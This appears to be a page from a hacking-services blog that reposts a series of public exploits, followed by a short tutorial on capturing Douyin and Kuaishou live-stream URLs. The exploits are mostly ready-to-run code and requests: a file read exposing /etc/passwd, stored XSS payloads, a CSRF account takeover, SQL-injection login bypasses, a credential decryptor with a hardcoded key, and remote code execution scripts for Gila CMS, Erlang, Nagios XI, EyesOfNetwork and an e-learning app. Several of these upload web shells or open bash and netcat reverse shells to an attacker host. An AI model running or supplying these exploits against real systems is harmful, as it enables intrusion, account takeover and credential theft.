Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863153542

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking

EyesOfNetwork 5.3 - LFI 

# Exploit Title: EyesOfNetwork 5.3 - LFI
# Date: 10/01/2021
# Exploit Author: Audencia Business SCHOOL Red Team
# Vendor Homepage: https://www.eyesofnetwork.com/en
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3

The php not exclude other tools than proposed one. It's possible possible to include files when the parameter "tool_list=" is modified like that :

==================================================================
POST /module/tool_all/select_tool.php HTTP/1.1
Host: 192.168.0.26
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 209
Origin: https://192.168.0.26
Connection: close
Referer: https://192.168.0.26/module/tool_all/
Cookie: session_id=746751013; user_name=admin; user_id=1; user_limitation=0; group_id=1

(tool_list=FILE TO READ)
page=bylistbox&host_list=127.0.0.1&tool_list=/etc/passwd&snmp_com=aze&snmp_version=2c&min_port=1&max_port=1024&username=&password=&snmp_auth_protocol=MD5&snmp_priv_passphrase=&snmp_priv_protocol=&snmp_context=

==================================================================


Result a printed /etc/passwd document in the webpage : 

==================================================================

HTTP/1.1 200 OK 
Date: Sat, 09 Jan 2021 01:16:21 GMT 
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3 
X-Powered-By: PHP/5.4.16 
Content-Length: 1529 
Connection: close 
Content-Type: text/html; charset=UTF-8 
 
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nagios:x:999:991::/var/spool/nagios:/sbin/nologin
influxdb:x:998:998::/var/lib/influxdb:/bin/false
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
grafana:x:997:995:grafana user:/usr/share/grafana:/sbin/nologin
polkitd:x:996:994:User for polkitd:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
snmptt:x:995:992:SNMP Trap Translator:/var/spool/snmptt:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:994:990::/var/lib/chrony:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
cacti:x:1000:991::/home/cacti:/bin/bash
eon4apps:x:1001:991::/srv/eyesofnetwork/eon4apps:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
admin:x:1002:1000:admin:/home/admin:/bin/bash

==================================================================
HireHackking 
# Exploit Title: OpenCart 3.0.36 - ATO via Cross Site Request Forgery
# Date: 01-09-2021
# Exploit Author: Mahendra Purbia {Mah3Sec}
# Vendor Homepage: https://www.opencart.com
# Software Link: https://www.opencart.com/index.php?route=cms/download
# Version: OpenCart CMS - 3.0.3.6
# Tested on: Kali Linux

#Description:
OpenCart CMS 3.0.3.6 & below versions are vulnerable to Account takeover via CSRF, related to the endpoint /account/edit.

Steps to Reproduce:
1. create accounts a. victim & b. Attacker (attacker account is just for fetch the request and create a CSRf POC)
2. Now login with Attacker account and then go to account/edit and change the email and intercept this request in repeater, now create a CSRF POC of that request.
3. now in that poc change the email and email which is not registered {attacker another email}. Now save this request as a .html file.
4. now send this POC to the victim. and then the victim opens that file automatically all information is changed like name, email etc.
5. now attacker access account (with help of forgot password which came on attacker email) and fetch victim all information.
HireHackking 
# Exploit Title: WordPress Plugin Custom Global Variables 1.0.5 - 'name' Stored Cross-Site Scripting (XSS) 
# Google Dork: NA
# Date: 09/01/2021
# Exploit Author: Swapnil Subhash Bodekar
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/custom-global-variables/#developers
# Version: 1.0.5
# Tested on Windows

How to reproduce vulnerability:

1. Install WordPress 5.6
2. Install and activate Custom Global variables plugin.
3. Navigate to Setting >> Custom Global Variables and enter the data into the user input field.
4. Capture the request into burp suite and append the JavaScript payload which is mentioned below 
"><script>(1)</script><"
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.
HireHackking 
# Exploit Title: PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval
# Date: 9 Jan 2021
# Exploit Author: rootabeta
# Vendor Homepage: The original page, https://dmitryivanov.net/, cannot be found at this time of writing. The vulnerable software can be downloaded from https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml
# Software Link: https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml
# Version: Tested on: 4.3.6578.38136. All versions that use the similar file format are likely vulnerable.
# Tested on: Windows 10 x64. Exploit likely works on all OSs that PBK runs on. 

# PortableKanBan stores credentials in an encrypted format
# Reverse engineering the executable allows an attacker to extract credentials from local storage
# Provide this program with the path to a valid PortableKanban.pk3 file and it will extract the decoded credentials

import json
import base64
from des import * #python3 -m pip install des
import sys

try:
	path = sys.argv[1]
except:
	exit("Supply path to PortableKanban.pk3 as argv1")

def decode(hash):
	hash = base64.b64decode(hash.encode('utf-8'))
	key = DesKey(b"7ly6UznJ")
	return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8')

with open(path) as f:
	try:
		data = json.load(f)
	except: #Start of file sometimes contains junk - this automatically seeks valid JSON
		broken = True
		i = 1
		while broken:
			f.seek(i,0)
			try:
				data = json.load(f)
				broken = False
			except:
				i+= 1
			

for user in data["Users"]:
	print("{}:{}".format(user["Name"],decode(user["EncryptedPassword"])))
HireHackking

Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)

HACKER · %s · %s

# Exploit Title: Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated) # Date: 1.12.2021 # Exploit Author: Enesdex # Vendor Homepage: https://gilacms.com/ # Software Link: https://github.com/GilaCMS/gila/releases/tag/2.0.0 # Version: x < 2.0.0 # Tested on: Windows 10 import requests import time target_url = "http://192.168.1.101:80/Gila/" cmd = "calc.exe" url = target_url+"?c=admin" cookies = {"GSESSIONID": "../../index.php"} headers = {"User-Agent": "<?php shell_exec('"+cmd+"'); include 'src\\core\\bootstrap.php'; ?>"} requests.get(url, headers=headers, cookies=cookies) time.sleep(5) requests.get(target_url+"/index.php")
HireHackking

SmartAgent 3.1.0 - Privilege Escalation

HACKER · %s · %s

# Exploit Title: SmartAgent 3.1.0 - Privilege Escalation # Date: 01-11-2021 # Exploit Author: Orion Hridoy # Vendor Homepage: https://www.smartagent.io/ # Version: Build 3.1.0 # Tested on: Windows 10/Kali Linux A Low grade user like ViewOnly can create an account with SuperUser permission. Steps To Reproduce: 1. Create a user with ViewOnly 2. Visit https://demo.localhost.com/#/CampaignManager/users 3. Now you will be able to create an account with SuperUser. #Python Exploit [Replace With Your Authorization Code] import requests session = requests.Session() rawBody = "{\"username\":\"orion@hridoy.com \",\"password\":\"Orionhridoy69\",\"appName\":\"AppEngage\",\"role\":\"Admin\",\"android\":\"1\",\"ios\":\"0\",\"kai\":\"0\"}" headers = {"Authorization":"id=orion@gmail.com,engageToken=eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJvcmlvbkBnbWFpbC5jb20iLCJyb2xlcyI6WyJWaWV3T25seSJdLCJhcHBOYW1lIjoiQXBwRW5nYWdlIiwicGxhdGZvcm0iOiJBTkRST0lEIiwiaXNzIjoiRU5BR0FHRSIsImlhdCI6MTYxMDM3NDEyMCwiZXhwIjoxNjExMjM4MTIwfQ.SbnZaRe3-2GOFOm7QDzvIBQCKBAK_GV-wKsMoH4GGChyjUFe2Ij4LiVl5rXsWRfTqNnJXj9fFxYTzkD2-kXlAQ","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":"https://demo.localhost.com/","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Content-Type":"application/json"} response = session.post("https://demo.localhost.com/api/createUser", data=rawBody, headers=headers) print("User Created With\nUser: orion@hridoy.com\nPass: Orionhridoy69")
HireHackking

Erlang Cookie - Remote Code Execution

HACKER · %s · %s

# Exploit Title: Erlang Cookie - Remote Code Execution # Date: 2020-05-04 # Exploit Author: 1F98D # Original Author: Milton Valencia (wetw0rk) # Software Link: https://www.erlang.org/ # Version: N/A # Tested on: Debian 9.11 (x64) # References: # https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ # # Erlang allows distributed Erlang instances to connect and remotely execute commands. # Nodes are permitted to connect to eachother if they share an authentication cookie, # this cookie is commonly called ".erlang.cookie" # #!/usr/local/bin/python3 import socket from hashlib import md5 import struct import sys TARGET = "192.168.1.1" PORT = 25672 COOKIE = "XXXXXXXXXXXXXXXXXXXX" CMD = "whoami" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET, PORT)) name_msg = b"\x00" name_msg += b"\x15" name_msg += b"n" name_msg += b"\x00\x07" name_msg += b"\x00\x03\x49\x9c" name_msg += b"AAAAAA@AAAAAAA" s.send(name_msg) s.recv(5) # Receive "ok" message challenge = s.recv(1024) # Receive "challenge" message challenge = struct.unpack(">I", challenge[9:13])[0] print("Extracted challenge: {}".format(challenge)) challenge_reply = b"\x00\x15" challenge_reply += b"r" challenge_reply += b"\x01\x02\x03\x04" challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest() s.send(challenge_reply) challenge_res = s.recv(1024) if len(challenge_res) == 0: print("Authentication failed, exiting") sys.exit(1) print("Authentication successful") ctrl = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex" msg = b'\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k' msg += struct.pack(">H", len(CMD)) msg += bytes(CMD, 'ascii') msg += b'jw\x04user' payload = b'\x70' + ctrl + msg payload = struct.pack('!I', len(payload)) + payload print("Sending cmd: '{}'".format(CMD)) s.send(payload) print(s.recv(1024))
HireHackking

Online Hotel Reservation System 1.0 - Admin Authentication Bypass

HACKER · %s · %s

# Exploit Title: Online Hotel Reservation System 1.0 - Admin Authentication Bypass # Exploit Author: Richard Jones # Date: 2021-01-13 # Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 #Exploit URL: http://TARGET/marimar/admin/index.php Host: TARGET POST /marimar/admin/login.php HTTP/1.1 Content-Length: 57 Connection: close Cookie: PHPSESSID=82sevuai2qhh9h8b5jbucn0616 email=admin%27+or+1%3D1+--+-ac1d&pass=asdasdasd&btnlogin=
HireHackking

Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated)

HACKER · %s · %s

# Exploit Title: Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated) # Date: 19/12/2020 # Exploit Author: Haboob Team (https://haboob.sa) # Vendor Homepage: https://www.nagios.com/products/nagios-xi/ # Version: Nagios XI 5.7.x # Tested on: (Ubuntu 18.04 / PHP 7.2.24) & Vendor's custom VM # CVE: CVE-2020-35578 #!/usr/bin/python3 # pip3 install bs4 lxml import requests import sys import warnings from bs4 import BeautifulSoup import base64 import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) if len(sys.argv) != 6: print("[~] Usage : python3 nagiosxi-rce.py http(s)://url username password reverse_ip reverse_port") print("[~] Example : python3 nagiosxi-rce.py https://192.168.224.139 nagiosadmin P@ssw0rd 192.168.224.138 443") exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] ip = sys.argv[4] port = sys.argv[5] request = requests.session() def login(): # Request nsp value (Nagios Session Protection, used to prevent CSRF attacks) nsp_str_req = request.get(url+"/nagiosxi/login.php", verify=False) content = nsp_str_req.text soup = BeautifulSoup(content, "lxml") nsp_str = soup.find_all('input')[0].get('value') print("[+] Extract login nsp token : %s" % nsp_str) # Login login_info = { "nsp": nsp_str, "pageopt": "login", "username": username, "password": password } login_request = request.post(url + "/nagiosxi/login.php", login_info, verify=False) login_text = login_request.text # Check Login Status if "Core Config Manager" in login_text: return True else: print("[-] Login ... Failed!") return False def execute_payload(): # Request nsp value (Nagios Session Protection, used to prevent CSRF attacks) print("[+] Request upload form ...") nsp_str_req = request.get(url+"/nagiosxi/admin/monitoringplugins.php", verify=False) content = nsp_str_req.text soup = BeautifulSoup(content, "lxml") nsp_str = soup.find_all('input')[1].get('value') print("[+] Extract upload nsp token : %s" % nsp_str) # Payload Base64 Encoding payload_decoded = "bash -i >& /dev/tcp/%s/%s 0>&1" % (ip, port) payload_bytes = payload_decoded.encode('ascii') base64_bytes = base64.b64encode(payload_bytes) payload_encoded = base64_bytes.decode('ascii') payload = ";echo " + payload_encoded + " | base64 -d | bash;#" print("[+] Base64 encoded payload : %s" % payload) # Payload Execution multipart_form_data = { 'upload': (None, '', None), 'nsp': (None, nsp_str, None), 'uploadedfile': (payload, 'whatever', 'text/plain'), 'convert_to_unix': (None, '1', None), } print("[+] Sending payload ...") print("[+] Check your nc ...") rce = request.post(url +"/nagiosxi/admin/monitoringplugins.php", files=multipart_form_data, verify=False) if login(): print("[+] Login ... Success!") execute_payload()
HireHackking
# Exploit Title: WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS) # Date: 14/01/2021 # Exploit Author: Rahul Ramakant Singh # Vendor Homepage: https://ghozylab.com/plugins/ # Software Link: https://demo.ghozylab.com/plugins/easy-contact-form-plugin/ # Version: 1.1.7 # Tested on Windows Steps: 1. Install WordPress 5.6 2. Install and activate *Contact Form Plugin* plugin. 3. Go to * Contact Form Plugin *plugin section and click on the add new form button. 4. Fill all required details and click on the save button and capture the request in a proxy tool like burp suite. 6. Append the JavaScript payload in the "Email Header" field as mentioned below *"<sc><svg/onload=alert(454)>"* 5. You will observe that the payload successfully got stored and reflected into the response and the malicious JavaScript payload got executed successfully and we are getting a pop-up.
HireHackking
# Exploit Title: PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message) # Date: 2020-12-21 # Exploit Author: Mohamed Oosman B S # Vendor Homepage: https://www.php-fusion.co.uk/ # Software Link: https://www.php-fusion.co.uk/phpfusion_9_downloads.php # Version: 9.03.90 and below # Tested on: Windows 10 # CVE : CVE-2020-35687 1. Description: PHP-Fusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of shoutbox messages by the attacker on behalf of the logged in victim. 2. Proof of Concept As the requests for deleting the admin shoutbox are sent using the GET method, the CSRF attack to delete an attacker-controlled shoutbox message can be performed by having the admin visit https://TARGET.com/infusions/shoutbox_panel/shoutbox_archive.php?s_action=delete&shout_id=1 directly, after getting to know the shout_id of the message, as it is sequential. <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://TARGET/infusions/shoutbox_panel/shoutbox_archive.php"> <input type="hidden" name="s&#95;action" value="delete" /> <input type="hidden" name="shout&#95;id" value="3" /> <input type="submit" value="Submit request" /> </form> </body> </html>
HireHackking
# Exploit Title: Online Hotel Reservation System 1.0 - Stored Cross-site Scripting # Exploit Author: Mesut Cetin # Date: 2021-01-14 # Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 ######## Description ######## The room 'description' parameter is vulnerable to stored Cross-site Scripting. ######## Proof of Concept ######### Login with administrator credentials at http://localhost/admin with admin:admin and click on "Rooms" tab. Edit "description" parameter: 1<script>alert('document.cookie')</script> Any user at http://localhost/marimar/index.php will get the XSS pop-up warning with their cookie values.
HireHackking

EyesOfNetwork 5.3 - File Upload Remote Code Execution

HACKER · %s · %s

# Exploit Title: EyesOfNetwork 5.3 - File Upload Remote Code Execution # Date: 10/01/2021 # Exploit Author: Ariane.Blow # Vendor Homepage: https://www.eyesofnetwork.com/en # Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso # Version: 5.3-10 (12/9/2020-lastest) #!/bin/bash # (/!\) You may have change this string : "user_id=1; user_limitation=0; group_id=1" if you are not the admin user in the admin group, you find this in the cookies params /!\ ############################################### # (Authentified) # # Abritraty file upload # # It whase a Challenge to do that in BASH # # But the exploit's working fine ! # # ........... # # Exploit is working with the actual version # # Scripted on 01/10/2021 # # By Ariane.Blow # # https://ariane.agency/ # ############################################### banner() { clear echo " ,*-." echo ' | |' echo ' ,. | |' echo ' | |_| | ,.' echo ' `---. |_| |' echo ' | .--`' echo " | |" echo " | |" echo ""Ω echo " ! DO NOT USE IF YOU DONT HAVE PERSMISSION !" echo "" echo " EyesOfNetwork 5.3-10" echo "" echo " RedTeam Tool" echo "" echo " Input verification desertion" echo "" echo " RCE via Arbitrary FileUpload" echo "" echo "" } VAR() { #var #Beacause I don't whant to see all the *.sh in my OPT directory ... BashMan Tips xD ! mkdir /tmp/EON53 cd /tmp/EON53 #you can not upload more than 1 file with a same URL and same filename, i just add a random char at the end of URL and in the filename export random=$(cat /dev/urandom | tr -dc 'bcdfghjklmnpqrstvwxz' | head -c 9) export filename=shell$random.xml.php echo "EyesOfNetwork IP :" read eonIP echo "HackerIP (used to start the listener) :" read hackerIP echo "Hacker PORT (used to start the listener):" read PORT echo "Username (default = admin) :" read username echo "password :" read password } #Getting the session_id GetSessionID() { echo "getting sessionID ... " echo "curl -i -s -k -X $'POST' -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://$eonIP/login.php' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 20' -H $'Origin: https://$eonIP' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' --data-binary $'login=$username&mdp=$password' $'https://$eonIP/login.php' | grep session | cut -d ';' -f 1 | cut -d '=' -f 2" >> GetSession.sh chmod +x GetSession.sh sessionID=$(./GetSession.sh) echo "sessionID acquired : $sessionID" sleep 3 echo } #start listener start_listen() { printf "\e[31;1m When the Reverse-Shell is etablished, you can PrivEsc with :\e[0m \n" echo "echo 'os.execute(\"/bin/sh\")' > /tmp/nmap.script" echo "sudo nmap --script=/tmp/nmap.script" printf "\e[31;1m ... I Know ... \e[0m \n" echo "gnome-terminal -e 'nc -lnvp $PORT'" >> listen.sh chmod +x listen.sh ./listen.sh } #POST payload Payload() { echo "Sending PostRequest ..." echo "curl -i -s -k -X $'POST' \ -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Type: multipart/form-data; boundary=---------------------------123135855827554554412483984802' -H $'Content-Length: 1565' -H $'Origin: https://$eonIP' -H $'Connection: close' -H $'Referer: https://$eonIP/module/admin_itsm/modification_itsm.php' -H $'Cookie: session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \ -b $'session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \ --data-binary $'-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_url_id\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_url\"\x0d\x0a\x0d\x0ahttp://HackMe.ImFamous$random\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"fileName\"; filename=\"$filename\"\x0d\x0aContent-Type: text/xml\x0d\x0a\x0a<?php\x0d\x0aexec(\"/bin/bash -c \'bash -i > /dev/tcp/$hackerIP/$PORT 0>&1\'\");\x0a\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"input_file_name\"\x0d\x0a\x0d\x0ashell.xml\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_type_request\"\x0d\x0a\x0d\x0aget\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_header[]\"\x0d\x0a\x0d\x0aaz\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_var[0][var_name]\"\x0d\x0a\x0d\x0aaz\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_var[0][champ_ged_id]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_parent\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_return_champ\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0aadd_external_itsm\x0d\x0a-----------------------------123135855827554554412483984802--\x0d\x0a' \ $'https://$eonIP/module/admin_itsm/ajax.php' | grep success" >> req.sh chmod +x req.sh ./req.sh } #Get request on PHP exploit Req_payload() { echo "Get request on the PHP payload ..." echo "curl -i -s -k -X $'GET' \ -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Cookie: session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' \ -b $'session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \ $'https://$eonIP/module/admin_itsm/uploaded_file/$filename'" >> reqGET.sh chmod +x reqGET.sh ./reqGET.sh } #Clearing Clear_cache() { echo "clearing cache" rm listen.sh rm req.sh rm reqGET.sh rm GetSession.sh cd .. rmdir EON53 } #MAIN banner VAR GetSessionID start_listen Payload Req_payload Clear_cache
HireHackking

E-Learning System 1.0 - Authentication Bypass

HACKER · %s · %s

# Exploit Title: E-Learning System 1.0 - Authentication Bypass & RCE # Exploit Author: Himanshu Shukla & Saurav Shukla # Date: 2021-01-15 # Vendor Homepage: https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/caiwl.zip # Version: 1.0 # Tested On: Kali Linux + XAMPP 7.4.4 # Description: E-Learning System 1.0 - Authentication Bypass Via SQL Injection + Remote Code Execution #Step 1: run the exploit in python with this command: python3 exploit.py #Step 2: Input the URL of the vulnerable application: Example: http://10.10.10.23/caiwl/ #Step 3: Input your LHOST where you want the reverse shell: Example: 10.9.192.23 #Step 4: Input your LPORT that is the port where the reverse shell will spawn: Example: 4444 #Step 5: Start a Netcat Listener on the port specified in Step 4 using this command: nc -lnvp 4444 #Step 6: Hit enter on the if your Netcat Listener is ready, and you will get a reverse shell as soon as you hit enter. import requests print('########################################################') print('## E-LEARNING SYSTEM 1.0 ##') print('## AUTHENTICATION BYPASS & REMOTE CODE EXECUTION ##') print('########################################################') print('Author - Himanshu Shukla & Saurav Shukla') GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults #Create a new session s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") #Authentication Bypass print("[*]Attempting Authentication Bypass...") values = {"user_email":"'or 1 or'", "user_pass":"lol","btnLogin":""} r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) #Check if Authentication was bypassed or not. logged_in = True if("You login as Administrator." in r.text) else False l=logged_in if l: print(GREEN+"[+]Authentication Bypass Successful!", RESET) else: print(RED+"[-]Failed To Authenticate!", RESET) #Creating a PHP Web Shell phpshell = { 'file': ( 'shell.php', '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 'application/x-php', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'LessonChapter':'test', 'LessonTitle':'test','Category':'Docs','save':''} #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'/admin/modules/lesson/controller.php?action=add', cookies=cookies, files=phpshell, data=data, verify=False) shell_upload = True if("window.location='index.php'" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) print("[*]Please Input Reverse Shell Details") LHOST=input("[*]LHOST : ") LPORT=input("[*]LPORT : ") print('[*]Start Your Netcat Listener With This Command : nc -lvnp '+LPORT) input('[*]Hit Enter if your netcat shell is ready. ') print('[+]Deploying The Web Shell...') #Executing The Webshell e=s.get('http://192.168.1.5/caiwl/admin/modules/lesson/files/shell.php?cmd=nc 192.168.1.2 9999 -e /bin/bash', cookies=cookies) exit()
HireHackking

Title: Crawl Douyin Kuaishou Camera Live Streaming

HACKER · %s · %s

In recent years, live broadcasts on various platforms have become increasingly popular. In life and production, we need some live broadcast scenarios. For example, the live streaming of Douyin and Kuaishou platforms are captured and played directly in real time in the network player. Can it be done? Let’s study with my cousin!http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/3_20221028182552.gif
Three common live broadcast protocols
The RTMP protocol is designed for streaming media and is used more frequently in streaming. At the same time, most CDN manufacturers support the RTMP protocol.
HTTP-FLV uses HTTP long connections similar to RTMP streaming and needs to be distributed by a specific streaming server, taking into account the advantages of both. and a streaming protocol that can reuse existing HTTP distribution resources. Its real-time performance is equal to RTMP, which saves some protocol interaction time compared to RTMP, has shorter first-screen time and more expandable functions.
As a live broadcast protocol proposed by Apple, HLS occupies an unshakable position on the iOS side, and the Android side also provides corresponding support.http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028182848.png?x-oss-process=style/gzh
Get Douyin Kuaishou Live Streaming
What if you get the live broadcast address of Douyin? We just need to use the traffic analysis tool to grab the URL containing the above protocol.
First we find the current live broadcast to crawl. And share it as follows:
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028183449.png?x-oss-process=style/gzh
Open the shared address in the browser, bing
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028183759.png?x-oss-process=style/gzh
Then use the traffic analysis tool to grab the current data packet.
Then, we search for the file format flv or m3u8 in the live broadcast protocol.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028184833.png?x-oss-process=style/gzh
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028184858.png?x-oss-process=style/gzh
Right-click to copy the address. Then put it in the streaming media playback tool to test it.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028185013.png?x-oss-process=style/gzhThe effects are as followshttp://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028185059.png?x-oss-process=style/gzh
In the same way, we can capture the live stream of Kuaishou B station.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028185406.png?x-oss-process=style/gzh
Crawl data http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028185441.png?x-oss-process=style/gzh
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028185617.png?x-oss-process=style/gzh
Use HTML display
Now I encounter such a new problem. We got the live stream. But it can only be played through a streaming player. Can you play live videos through html?
